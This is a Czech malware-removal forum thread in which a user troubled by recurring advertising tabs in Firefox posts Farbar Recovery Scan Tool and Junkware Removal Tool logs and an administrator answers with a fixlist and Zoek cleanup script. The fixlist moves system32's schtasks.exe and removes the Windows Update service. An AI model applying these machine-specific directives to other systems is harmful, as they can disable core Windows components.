FirewallRules: [{53DB185F-AC50-407C-8DBC-868D5480C1B9}] => (Allow) C:\Users\Milan\AppData\Roaming\0246cded558e\0246cded558e.exe => No File
C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe
C:\Users\Milan\AppData\Local\Temp
C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
C:\Windows\System32\schtasks.exe
HKLM-x32\...\Run: [DiskFixer] => C:\Program Files (x86)\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe"
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} - "H:\setup.exe"
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]

EmptyTemp:
Hosts:
End
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#8 Příspěvek od martybx »

llog zde:

Kód: Vybrat vše

Fix result of Farbar Recovery Scan Tool (x64) Version: 09-09-2020
Ran by Milan (11-09-2020 19:11:39) Run:1
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
FirewallRules: [TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [{21A57DD2-2491-485C-BF53-169D9F586B7F}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{325BD370-A36E-489E-A599-AB133BADB490}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{2A891082-BCF5-4CD4-82EF-E3EF4198782E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{894A84BA-5FED-41DC-9186-4EC56F14C63B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{B74BA9EF-DF6C-486F-838D-27C253A82114}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{C7EB689E-FBBC-4034-A5E3-A156344389B6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{F2F85B56-CBE0-46DB-989F-B9836244F9B8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{53DB185F-AC50-407C-8DBC-868D5480C1B9}] => (Allow) C:\Users\Milan\AppData\Roaming\0246cded558e\0246cded558e.exe => No File
C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe
C:\Users\Milan\AppData\Local\Temp
C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
C:\Windows\System32\schtasks.exe
HKLM-x32\...\Run: [DiskFixer] => C:\Program Files (x86)\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe"
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} - "H:\setup.exe"
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avg => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\00avg => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{21A57DD2-2491-485C-BF53-169D9F586B7F}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{325BD370-A36E-489E-A599-AB133BADB490}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2A891082-BCF5-4CD4-82EF-E3EF4198782E}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{894A84BA-5FED-41DC-9186-4EC56F14C63B}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B74BA9EF-DF6C-486F-838D-27C253A82114}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C7EB689E-FBBC-4034-A5E3-A156344389B6}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F2F85B56-CBE0-46DB-989F-B9836244F9B8}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{53DB185F-AC50-407C-8DBC-868D5480C1B9}" => removed successfully
"C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe" => not found

"C:\Users\Milan\AppData\Local\Temp" folder move:

C:\Users\Milan\AppData\Local\Temp => moved successfully
"C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe" => not found
C:\Windows\System32\schtasks.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\DiskFixer" => not found
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} => removed successfully
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} => removed successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
HKLM\System\CurrentControlSet\Services\wuauserv => removed successfully
wuauserv => service removed successfully
wuauserv => service not found.
0246CDED558E => Unable to stop service.
HKLM\System\CurrentControlSet\Services\0246CDED558E => could not remove, key could be protected
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 140858105 B
Java, Flash, Steam htmlcache => 1172 B
Windows/system/drivers => 7318780 B
Edge => 721769 B
Chrome => 0 B
Firefox => 1116686493 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 23100 B
NetworkService => 288720 B
Milan => 3759414 B

RecycleBin => 0 B
EmptyTemp: => 1.2 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 11-09-2020 19:14:34)


Result of scheduled keys to remove after reboot:

HKLM\System\CurrentControlSet\Services\0246CDED558E => could not remove, key could be protected

==== End of Fixlog 19:14:34 ====
bohuzel ale po restartu pc a spusteni firefoxu opet skocila nova zalozka a v ni:
https://tv.idnes.cz/rozstrel/rozstrel-m ... paign=fb03

edit : po odeslani tohoto prispevku dalsi zalozka... :(

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#9 Příspěvek od Rudy »

Bylo smazáno. Ještě spusťte postupně tyto utility:

1. Stahnete Zoek.exe http://download.bleepingcomputer.com/smeenk/zoek.exe a ulozte jej na plochu

Pokud pouzivate Win Vista ci W7, kliknete na Zoek pravym a dejte Run As Administrator ci Spustit jako spravce
Do okna vlozte skript nize




autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;





Nasledne kliknete na Run Script
PC provede opravu, restartuje se a da Vam log, jeho obsah vlozte sem.

a

2. Junkware removal tool: https://www.stahuj.cz/utility_a_ostatni ... oval-tool/
•Ulozte nejlepe na plochu
•Po spusteni se zobrazi licencni podminky, stisknete libovolnou klavesu
•Probehne vytvoreni zalohy a nasledne prohledavani
•Probehne skenovani a pak se objevi log, pripadne bude ulozen v c:\JRT jako JRT.txt, ten sem vlozte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#10 Příspěvek od martybx »

log prvni je v priloze:
zoek-results.rar
(14.22 KiB) Staženo 52 x
druhy je zde:

Kód: Vybrat vše


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by Milan (Administrator) on 11.09.2020 at 21:46:04,26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0 




Registry: 2 

Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 11.09.2020 at 21:47:59,83
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a jeste na plose mam ikonu z programu o kterem nemam tuseni ze bych si ho tam daval..:
Vlozim cestu k nemu:
C:\Users\Milan\AppData\Local\ScrSnap\ScrSnap.exe

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#11 Příspěvek od Rudy »

Utility něco smazaly. ScrSnap (celý adresář) je šmejd, zkuste ho ručně smazat. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#12 Příspěvek od martybx »

Smejda jsem rucne celou slozku odstranil.
udelal preventivne restart.
A ted zatim OK , bez vyskakovani tech zalozek.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#13 Příspěvek od martybx »

Takze bohuzel...
dnes rano prijdu k pc a opet mam vyskakovaci zalozky .....
z 90% idnes.cz a blesk.cz
:(

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#14 Příspěvek od Rudy »

Dejte znovu logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#15 Příspěvek od martybx »

Kód: Vybrat vše

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-09-2020
Ran by Milan (administrator) on DESKTOP-AJHPLSQ (Gigabyte Technology Co., Ltd. GA-770T-D3L) (12-09-2020 11:52:30)
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Platform: Windows 10 Home Version 1909 18363.1016 (X64) Language: Čeština (Česko)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTAgent.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTShellHlp.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswEngSrv.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswidsagent.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGSvc.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGUI.exe <2>
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\wsc_proxy.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Milan\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <8>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe <3>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\spool\drivers\x64\3\E_YATIUNE.EXE <2>
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe <6>

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156808 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [451952 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [90951544 2020-09-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000001] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe" 
HKLM\...\Print\Monitors\EPSON L3150 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBUNE.DLL [184832 2017-07-14] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [500736 2016-09-14] (SEIKO EPSON CORPORATION) [File not signed]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{48F69C39-1356-4A7B-A899-70E3539D4982}] -> C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\Installer\chrmstp.exe [2020-09-10] (AVG Technologies USA, LLC -> AVG Technologies)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-03-21]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08C10116-0F05-4F1B-AF73-06B589373F46} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14679256 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {08E8831B-9A9D-4E04-A6EB-BD404165222C} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3858056 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {0F26C413-9F83-4AF2-812E-BAA9DD4D1CD7} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {2F09ED43-2A3D-464C-B5E5-B157022CE7EB} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_Plugin.exe [1502264 2020-09-08] (Adobe Inc. -> Adobe)
Task: {53EE07E4-1B5A-4925-9B87-CA84FDB1ED99} - System32\Tasks\AVGUpdateTaskMachineUA => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {79E87EF1-4D71-44FC-8873-A72C39CD80FC} - System32\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {7A446EC8-82DB-4A54-945E-27A566D3080B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [660688 2020-09-02] (Mozilla Corporation -> Mozilla Foundation)
Task: {94BE50EC-EFA1-4E08-9A28-6830D1121378} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2020-03-21] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {95CA5060-B138-497D-90C3-645A155D24D6} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1792136 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A77F7A79-4A0D-4E72-958D-1F2DA35B6B16} - System32\Tasks\AVG Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A86F3AA5-DE31-43BF-9913-2D9A69740383} - System32\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {BC8897D4-CC61-4362-8CDD-944E4953143E} - System32\Tasks\AVG Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {EA92647F-8039-4B01-9080-AE7111B54CD3} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{3B3152EA-857D-47CF-AB25-91BD1A979357} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{82897F20-ADA3-49EB-B2E4-DAED68663EB8} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 213.46.172.37 213.46.172.36
Tcpip\..\Interfaces\{e8de9f77-ea67-4223-a7f4-f48222bdaf84}: [DhcpNameServer] 213.46.172.37 213.46.172.36

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001 -> DefaultScope {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
